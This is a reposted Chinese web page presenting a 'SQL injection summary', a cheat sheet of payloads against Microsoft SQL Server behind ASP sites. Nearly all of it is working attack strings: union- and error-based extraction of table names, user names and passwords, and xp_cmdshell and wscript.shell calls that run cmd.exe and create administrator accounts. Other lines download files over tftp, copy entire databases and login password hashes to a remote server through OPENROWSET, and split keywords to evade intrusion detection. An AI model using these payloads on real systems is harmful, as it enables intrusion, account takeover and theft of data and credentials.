数据库

本类阅读TOP10
·SQL语句导入导出大全
·SQL Server日期计算
·SQL语句导入导出大全
·SQL to Excel 的应用
·Oracle中password file的作用及说明
·MS SQLServer OLEDB分布式事务无法启动的一般解决方案
·sqlserver2000数据库置疑的解决方法
·一个比较实用的大数据量分页存储过程
·如何在正运行 SQL Server 7.0 的服务器之间传输登录和密码
·SQL中两台服务器间使用连接服务器

分类导航
VC语言Delphi
VB语言ASP
PerlJava
Script数据库
其他语言游戏开发
文件格式网站制作
软件工程.NET开发
Sql注射总结

作者:未知 来源:月光软件站 加入时间:2005-2-28 月光软件站
Sql注射总结(强烈推荐)

[转贴]
Sql注射总结(早源于'or'1'='1)

最重要的表名:
select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses


最重要的一些用户名(默认sql数据库中存在着的)
public
dbo
guest(一般禁止,或者没权限)
db_sercurityadmin
ab_dlladmin

一些默认扩展


xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia 驱动器相关
xp_dirtree 目录
xp_enumdsn ODBC连接
xp_loginconfig 服务器安全模式信息
xp_makecab 创建压缩卷
xp_ntsec_enumdomains domain信息
xp_terminate_process 终端进程,给出一个PID

例如:
sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
exec xp_webserver
sp_dropextendedproc 'xp_webserver'
bcp "select * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
' group by users.id having 1=1-
' group by users.id, users.username, users.password, users.privs having 1=1-
'; insert into users values( 666, 'attacker', 'foobar', 0xffff )-

union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable'-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id')-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id','login_name')-
union select TOP 1 login_name FROM logintable-
union select TOP 1 password FROM logintable where login_name='Rahul'--
构造语句:查询是否存在xp_cmdshell
' union select @@version,1,1,1--
and 1=(select @@VERSION)
and 'sa'=(select System_user)
' union select ret,1,1,1 from foo--
' union select min(username),1,1,1 from users where username > 'a'-
' union select min(username),1,1,1 from users where username > 'admin'-
' union select password,1,1,1 from users where username = 'admin'--
and user_name()='dbo'
and 0<>(select user_name()-
; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user swap 5245886 /add'
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'


1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='xp_cmdshell')
and 1=(select IS_SRVROLEMEMBER('sysadmin')) 判断sa权限是否
and 0<>(select top 1 paths from newtable)-- 暴库大法
and 1=(select name from master.dbo.sysdatabases where dbid=7) 得到库名(从1到5都是系统的id,6以上才可以判断)
创建一个虚拟目录E盘:
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认 Web 站点" -v "e","e:\"'
访问属性:(配合写入一个webshell)
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'


and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9.... 得到更多的数据库名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 暴到一个表 假设为 admin

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin')) 来得到其他的表。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin'
and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假设为 user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
('id',...)) 来暴出其他的字段
and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用户名
依次可以得到密码。。。。。假设存在user_id username ,password 等字段

Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
(union语句到处风靡啊,access也好用

暴库特殊技巧::%5c='\' 或者把/和\ 修改%5提交
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 得到表名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) 判断id值
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段

http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[swap] ([swappass][char](255));--

http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1
;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test)

http://61.131.96.39/PageShow.asp?TianName=政策法规&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";--


得到了web路径d:\xxxx,接下来:
http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--


传统的存在xp_cmdshell的测试过程:
;exec master..xp_cmdshell 'dir'
;exec master.dbo.sp_addlogin hax;--
;exec master.dbo.sp_password null,hax,hax;--
;exec master.dbo.sp_addsrvrolemember hax sysadmin;--
;exec master.dbo.xp_cmdshell 'net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';--
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
http://www.xxx.com/list.asp?classid=1; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user swap 5258 /add'
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net localgroup administrators swap/add'

http://localhost/show.asp?id=1'; exec master..xp_cmdshell 'tftp -i youip get file.exe'-

declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
;declare @a;set @a=db_name();backup database @a to disk='你的IP你的共享目录bak.dat'
如果被限制则可以。
select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin hax')
传统查询构造:
select * FROM news where id=... AND topic=... AND .....
admin'and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass <>'
select 123;--
;use master;--
:a' or name like 'fff%';-- 显示有一个叫ffff的用户哈。
'and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--
说明:
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用表叫ad
然后根据表名ad得到这个表的ID
ffff';update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--

象下面这样就可以得到第二个表的名字了
ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--
ffff';update [users] set email=(select top 1 count(id) from password) where name='ffff';--
ffff';update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--

ffff';update [users] set email=(select top 1 name from password where id=2) where name='ffff';--

exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
扩展存储就可以通过一般的方法调用:
exec xp_webserver
一旦这个扩展存储执行过,可以这样删除它:
sp_dropextendedproc 'xp_webserver'

insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-

insert into users values( 667,123,123,0xffff)-

insert into users values ( 123, 'admin''--', 'password', 0xffff)-

;and user>0
;;and (select count(*) from sysobjects)>0
;;and (select count(*) from mysysobjects)>0 //为access数据库

-----------------------------------------------------------通常注射的一些介绍:
A) ID=49 这类注入的参数是数字型,SQL语句原貌大致如下:
select * from 表名 where 字段=49
注入的参数为ID=49 And [查询条件],即是生成语句:
select * from 表名 where 字段=49 And [查询条件]

(B) Class=连续剧 这类注入的参数是字符型,SQL语句原貌大致概如下:
select * from 表名 where 字段='连续剧'
注入的参数为Class=连续剧' and [查询条件] and ''=' ,即是生成语句:
select * from 表名 where 字段='连续剧' and [查询条件] and ''=''
(C) 搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:
select * from 表名 where 字段like '%关键字%'
注入的参数为keyword=' and [查询条件] and '%25'=', 即是生成语句:
select * from 表名 where字段like '%' and [查询条件] and '%'='%'
;;and (select Top 1 name from sysobjects where xtype='U' and status>0)>0
sysobjects是SQLServer的系统表,存储着所有的表名、视图、约束及其它对象,xtype='U' and status>0,表示用户建立的表名,上面的语句将第一个表名取出,与0比较大小,让报错信息把表名暴露出来。
;;and (select Top 1 col_name(object_id('表名'),1) from sysobjects)>0
从⑤拿到表名后,用object_id('表名')获取表名对应的内部ID,col_name(表名ID,1)代表该表的第1个字段名,将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。


post.htm内容:主要是方便输入。
<iframe name=p src=# width=800 height=350 frameborder=0></iframe>
<br>
<form action=http://test.com/count.asp target=p>
<input name="id" value="1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--" style="width:750">
<input type=submit value=">>>">
<input type=hidden name=fno value="2, 3">
</form>
枚举出他的数据表名:
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--
这是将第一个表名更新到aaa的字段处。
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>'刚才得到的表名')。
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');--
然后id=1552 and exists(select * from aaa where aaa>5)
读出第二个表,^^^^^^一个个的读出,直到没有为止。
读字段是这样:
id=1552;update aaa set aaa=(select top 1 col_name(object_id('表名'),1));--
然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名
id=1552;update aaa set aaa=(select top 1 col_name(object_id('表名'),2));--
然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名
--------------------------------高级技巧:
[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>'你得到的表名' 查出一个加一个]) [ where 条件]
select top 1 name from sysobjects where xtype=u and status>0 and name not in('table1','table2',…)
通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]

[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
update 表名 set 字段=(select top 1 col_name(object_id('要查询的数据表名'),字段列如:1) [ where 条件]

绕过IDS的检测[使用变量]
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'


1、 开启远程数据库
基本语法
select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1' )
参数: (1) OLEDB Provider name
2、 其中连接字符串参数可以是任何和端口用来连接,比如
select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table'

要复制目标主机的整个数据库,首先要在目标主机上和自己机器上的数据库建立连接(如何在目标主机上建立远程连接,刚才已经讲了),之后insert所有远程表到本地表。

基本语法:
insert into OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1') select * from table2
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:
insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table1') select * from table2

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysdatabases')
select * from master.dbo.sysdatabases

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysobjects')
select * from user_database.dbo.sysobjects

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _syscolumns')
select * from user_database.dbo.syscolumns

之后,便可以从本地数据库中看到目标主机的库结构,这已经易如反掌,不多讲,复制数据库:
insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table1') select * from database..table1

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table2') select * from database..table2

......

3、 复4、 制哈西表(HASH)

这实际上是上述复5、 制数据库的一个扩展应用。登录密码的hash存储于sysxlogins中。方法如下:
insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysxlogins') select * from database.dbo.sysxlogins
得到hash之后,6、 就可以进行暴力破解。这需要一点运气和大量时间。


遍历目录的方法:
先创建一个临时表:temp
'5;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
5';insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
5';insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构,并寸入temp表中

5';insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看某个文件的内容
5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
5';insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc'

5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- (xp_dirtree适用权限PUBLIC)
写入表:
语句1:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
语句2:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
语句3:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
语句4:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
语句5:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
语句6:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
语句7:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
语句8:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
语句9:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_MEMBER('db_owner'));--
把路径写到表中去:
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(100), id int)-
http://http://www.xxxxx.com/down/list.asp?id=1;insert  dirs exec master.dbo.xp_dirtree 'c:\'-
http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-
http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))-
语句:http://http://www.xxxxx.com/down/list.asp?id=1;create table dirs1(paths varchar(100), id int)--
语句:http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'e:\web'--
语句:http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)-
把数据库备份到网页目录:下载
http://http://www.xxxxx.com/down/list.asp?id=1;declare @a sysname; set @a=db_name();backup database @a to disk='e:\web\down.bak';--


and%201=(select%20top%201%20name%20from(select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char(85))%20T%20order%20by%20id%20desc)
and%201=(select%20Top%201%20col_name(object_id('USER_LOGIN'),1)%20from%20sysobjects) 参看相关表。
and 1=(select%20user_id%20from%20USER_LOGIN)
and%200=(select%20user%20from%20USER_LOGIN%20where%20user>1)

相关文章

相关软件